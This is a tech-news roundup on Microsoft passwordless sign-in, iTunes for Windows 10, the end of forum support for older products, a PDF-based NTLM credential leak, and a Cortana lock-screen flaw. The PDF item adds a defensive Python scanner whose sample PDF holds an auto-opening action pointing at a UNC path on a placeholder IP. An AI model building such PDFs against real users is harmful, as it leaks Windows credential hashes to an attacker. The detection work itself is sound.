Passwords May Be Dead Soon If Microsoft Gets Its Way 

Karanbir Singh (a program manager at Microsoft) is on a mission:

Kill the password.

As he said in a recent blog post:

“Nobody likes passwords.  They are inconvenient, insecure, and expensive.  In fact, we dislike them so much that we’ve been busy at work trying to create a world without them–a world without passwords.”

The company’s stated goal is that an end user never has to deal with a password on a day to day basis, and instead authenticates with credentials that are far harder for an attacker to phish, crack offline, or steal in a breach.

To accomplish this goal, the company is looking at a number of options, including biometrics and multi-factor authentication schemes.

Singh notes that this isn’t just blue-sky thinking, either.  Already, more than 47 million users and more than five thousand businesses are utilizing “Windows Hello for Business.”  Another solution currently in use is the Microsoft Authenticator app, which allows users to access their Microsoft accounts via their smartphones.

Additionally, as part of the Windows 10 April 2018 Update, users with a Microsoft account or an Azure Active Directory account can sign in to a Windows 10 PC running in S mode without ever entering a password, using the Authenticator app together with Windows Hello.

The company is also taking advantage of the newly ratified Fast Identity Online (FIDO2) security protocol, and is in the process of updating Windows Hello to enable secure authentication across a wider range of scenarios.  For example:  The company is currently working on a proof of concept for shared PCs that will allow users to log on via FIDO2 security keys, which will allow employees to carry their credentials with them.

They envision a scenario in which any user can simply walk up to any device the organization controls and authenticate without ever having to enter their username or password. This would be especially useful for analysts, help desk personnel, and anyone working in the medical profession.

Obviously no firm timeframes have been given, but as mentioned, some of these technologies are already in use and will be refined in the months ahead.

Windows 10 Gets iTunes App For Apple Users

Apple promised that its iTunes app would be available on the Microsoft Store by the end of 2017.  The announcement was greeted with enthusiasm, but unfortunately, the company didn’t meet their own deadline. They cited the need for more time to build a more robust user experience for Windows users.

The wait is finally over, and it’s big news, because Windows 10 PCs running in S mode can only install apps from the Microsoft Store, and prior to this, iTunes was offered as a standalone download only.

The app is fairly sizeable, weighing in at 476.7MB, and is compatible with both x86 and x64 PCs.

A recent Microsoft blog post had this to say about the announcement:

“Now you can download iTunes from Microsoft Store and easily play your favorite music, movies and more – right from your Windows 10 PC.  iTunes is also home to Apple Music, where you can listen ad-free to over 45 million songs and download your favorites to enjoy without using WiFi.  iTunes is free to download, and you can try Apple Music free for three months.  There’s no commitment, and you can cancel anytime.”

One thing to be aware of is that if you already have an older version of iTunes installed on your machine and you download this app, it will automatically replace your older version.  It is recommended, therefore, that you back up your data before downloading the latest.  While it does offer a better user experience, it’s not worth the loss of your existing library of files.

Kudos to both Apple and Microsoft here. Apple for bringing an excellent free app to the Microsoft Store, and Microsoft for continuing to play nice with their longtime rival, and allowing their massive user base the pleasure of enjoying a portion of Apple’s wonderfully robust ecosystem.

Microsoft Ending Forum Support For Older Operating Systems

Big changes are coming from Microsoft starting in July (exact date unknown), and it has potentially dire implications if you’re using some of the company’s older technology.

Microsoft announced that in July, they’ll no longer provide forum-based support for a wide range of products and software, including:

  • Microsoft Band
  • Zune
  • Surface Pro
  • Surface Pro 2
  • Surface RT
  • Surface 2
  • Microsoft Security Essentials
  • Internet Explorer 10
  • Office 2010
  • Office 2013
  • Windows 7
  • Windows 8.1
  • Windows 8.1 RT

Although the company didn’t cite a specific reason for the change, it seems obvious that this is another move to push people into buying the latest and greatest of the company’s offerings.  Unfortunately for them, the announcement has been met with more than a little hostility, and for good reason.

Consider that the company has pledged to continue to support Windows 7 until January 2020, and Windows 8.1 (and variants) until January 2023.  Given that we’re still quite some distance from those EOL dates, closing an important avenue of support for a product the company is still ostensibly supporting seems a bit premature.  Nonetheless, there’s no indication at this time that the company has plans to extend the forum support for any of these products beyond July.

In some instances, this won’t prove to be problematic.  Few people still use Internet Explorer 10 as anything more than a curiosity, and Zune was never especially popular, so the loss of those forums isn’t likely to cause much backlash.  However, in the case of Windows 7 and 8.1, not only has the company pledged support for years to come, but those products are still actively used by a significant minority around the world, and those users aren’t thrilled with the recent announcement.

In any case, given that the company is unlikely to change course, this is all the more reason to make upgrading a priority if you’re still using any of the products mentioned above.

Hackers Can Use PDF Files To Access Windows Credentials

Security researcher Assaf Baharav of Check Point has found a new twist on an old, fairly well-known attack.  He was able to essentially “weaponize” PDFs so that opening one leaks the user’s Windows credentials in the form of an NTLM challenge-response hash, which the attacker can then crack offline or relay to another server.  Unfortunately, no action beyond simply opening the PDF is required for the hacker to get that information.

Baharav used the same methodology attackers have relied on in the past: the document carries a reference to a file on an attacker-controlled SMB server, and when the reader follows it, Windows tries to authenticate to that server automatically and sends the NTLM hash along.  Attacks of this type have already been carried out from web browsers, Windows shortcut files, shared folders, Microsoft Office documents, and Microsoft Outlook.  Using a PDF as the carrier is the new part.
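One way to triage incoming PDFs for this, as an added example that is not part of the article or of Check Point’s research: the script below scans the raw bytes of a PDF for the file-specification entries (/F, /UNC, /URL) used by the PDF actions that can name an external document (/GoToR, /GoToE, /Launch, all defined by the PDF specification; the article does not say which the researchers used) and flags any target that is a UNC path, a PDF-style //server/share path, or a file:/smb: URL, since those are what make Windows open an SMB session and hand over an NTLM challenge-response. The sample document and the 203.0.113.10 address are constructed for the example.

```python
"""Flag PDF file-spec targets that would make a reader open a remote path.

Added example, not Check Point's tooling or the article's own code.
Scans raw PDF bytes for the file-specification keys (/F, /UNC, /URL)
that /GoToR, /GoToE and /Launch actions use and reports any target that
is a UNC path, a PDF-style //server/share path, or a file:/smb: URL.
"""
import re

# A PDF literal string escapes backslash, so the UNC path \\host\share is
# stored on disk as (\\\\host\\share); hex strings <...> need no escaping.
_LITERAL = re.compile(rb'/(F|UNC|URL)\s*\(((?:\\.|[^\\)])*)\)', re.DOTALL)
_HEX = re.compile(rb'/(F|UNC|URL)\s*<([0-9A-Fa-f\s]*)>')
# /OpenAction and additional-action (/AA) dictionaries fire without a click.
_AUTO = re.compile(rb'/(OpenAction|AA)\b')

_ESCAPES = {b'n': b'\n', b'r': b'\r', b't': b'\t', b'b': b'\b', b'f': b'\f',
            b'(': b'(', b')': b')', b'\\': b'\\'}


def unescape_literal(raw: bytes) -> bytes:
    """Decode the body of a PDF literal string (the bytes between the parens)."""
    out = bytearray()
    i, n = 0, len(raw)
    while i < n:
        if raw[i] != 0x5C:                      # not a backslash: copy through
            out.append(raw[i])
            i += 1
            continue
        if i + 1 >= n:                          # dangling backslash: drop it
            break
        nxt = raw[i + 1:i + 2]
        if nxt in _ESCAPES:
            out += _ESCAPES[nxt]
            i += 2
        elif nxt in b'01234567':                # octal escape \ddd
            m = re.match(rb'[0-7]{1,3}', raw[i + 1:i + 4])
            out.append(int(m.group(0).decode(), 8) & 0xFF)
            i += 1 + len(m.group(0))
        elif nxt in (b'\r', b'\n'):             # backslash-newline continues the line
            i += 2
            if nxt == b'\r' and raw[i:i + 1] == b'\n':
                i += 1
        else:                                   # unknown escape: keep the char
            out += nxt
            i += 2
    return bytes(out)


def is_remote(target: bytes) -> bool:
    """True if opening this file spec would reach beyond the local disk."""
    t = target.strip().lower()
    return (t.startswith(b'\\\\') or t.startswith(b'//')
            or t.startswith(b'file:') or t.startswith(b'smb:'))


def find_remote_targets(pdf: bytes) -> list:
    """Return (key, decoded target) pairs for every remote file spec, in file order."""
    found = []
    for m in _LITERAL.finditer(pdf):
        target = unescape_literal(m.group(2))
        if is_remote(target):
            found.append((m.start(), m.group(1).decode(), target.decode('latin-1')))
    for m in _HEX.finditer(pdf):
        digits = re.sub(rb'\s+', b'', m.group(2))
        if len(digits) % 2:                     # PDF treats a missing final digit as 0
            digits += b'0'
        target = bytes.fromhex(digits.decode())
        if is_remote(target):
            found.append((m.start(), m.group(1).decode(), target.decode('latin-1')))
    found.sort()
    return [(key, target) for _, key, target in found]


def auto_triggered(pdf: bytes) -> bool:
    """True if the document carries an action that runs on open, with no click."""
    return _AUTO.search(pdf) is not None


# Constructed sample, not a real malicious file: an /OpenAction pointing at a
# UNC path (escaped as PDF requires), an embedded-file action whose target is
# given once as a hex string and once as /UNC, and a harmless local reference.
# 203.0.113.10 is from the documentation address range, not a real host.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /GoToR /F (\\\\203.0.113.10\\share\\bait.pdf) /D [0 /Fit] >> endobj
5 0 obj << /S /GoToE /F << /F <2F2F3230332E302E3131332E31302F7368617265> /UNC (//203.0.113.10/share) >> >> endobj
6 0 obj << /S /GoToR /F (local-copy.pdf) /D [0 /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for key, target in find_remote_targets(SAMPLE_PDF):
        print(f"remote file target via /{key}: {target}")
    print("fires on open:", auto_triggered(SAMPLE_PDF))
```

Because it works on raw bytes, the scan misses objects packed inside compressed object streams or an encrypted file; in practice you would first normalise the document with a PDF tool (for example `qpdf --qdf`) and then run the same checks. A remote target combined with /OpenAction is the zero-click case the article describes: the SMB request goes out the moment the file is opened.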

Baharav had this to say about his research:

“We chose to test these two high profile readers (Adobe Acrobat and the FoxIT reader).  Regarding the others, we highly suspect they may be vulnerable as well.  We followed a 90 days disclosure policy by notifying only Adobe and Foxit regarding the issues.”

Foxit did not respond to the information Baharav sent, but Adobe did.  Unfortunately, their response was not encouraging.  They simply announced that they had no plans to address the issue, deferring to Windows OS-level mitigations (reference Microsoft Security Advisory ADV170014).

Microsoft released that advisory to explain how to restrict NTLM single sign-on inside the Windows operating system, so that Windows no longer sends NTLM credentials automatically to servers outside the enterprise network.  This is a workable mitigation, but it has problems.

For starters, it’s not really a patch, but a hardening setting: a registry change plus a network isolation policy that tells Windows which resources count as enterprise ones.  Worse, it only applies to Windows 10 and Windows Server 2016 machines.  The advisory offers nothing for older systems.

Be on the alert, then: PDFs can now be used to steal credentials.  Only Adobe Acrobat and Foxit Reader were tested, but the researcher suspects other readers are affected as well, and no fix is coming from Adobe.  Older systems are not entirely without options, though.  The leak only works if the victim’s PC can reach the attacker’s SMB server, so blocking outbound TCP 445 and 139 at the network edge stops it, and the “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” policy, available since Windows 7, can refuse to send NTLM at all (with the usual caveat that it also breaks legitimate NTLM access to servers not on its exception list).

Turn Cortana Off At Lock Screen To Avoid Potential Hack

Do you use Cortana?  It’s a handy virtual assistant (like Siri) built into Windows 10.  Unfortunately, as useful as she is, there’s a problem. Even if you don’t use Cortana yourself, take heed:  Microsoft has recently issued a security update based on findings by McAfee researchers.

It turns out that Cortana can be “summoned” from the lock screen of your PC and used to execute attacks by tricking the ever-helpful Cortana into indexing files from a USB drive, then executing them.

To accomplish the attack, the hacker would need physical access to the PC.  With that in hand, they could run PowerShell scripts to reset your Windows 10 password, which would then give them unfettered access.

The vulnerability takes advantage of two things:  First, Cortana “listens” for commands, even while the PC is locked. Then, the OS indexes files constantly so that they’re ready to use at a moment’s notice.  Put those two elements together and you have the makings of a disaster.

Microsoft has shipped a patch for the issue.  For machines that haven’t received it yet, the company advises disabling Cortana on the lock screen, so that your PC has to be unlocked before she will respond.  That is good advice in any case, given that not every organization applies patches as soon as they are available, and this one is important.

To be safe, even if you don’t use Cortana, go into Settings > Cortana > Talk to Cortana and turn off “Use Cortana even when my device is locked.”  Then, when you’re away from your PC, at least that’s one less thing you have to worry about.

Unfortunately, this isn’t the first Cortana-related security issue we’ve seen, and it’s not likely to be the last.  As useful as the feature is, it does open the door to a number of other (potential) problems.  Stay vigilant.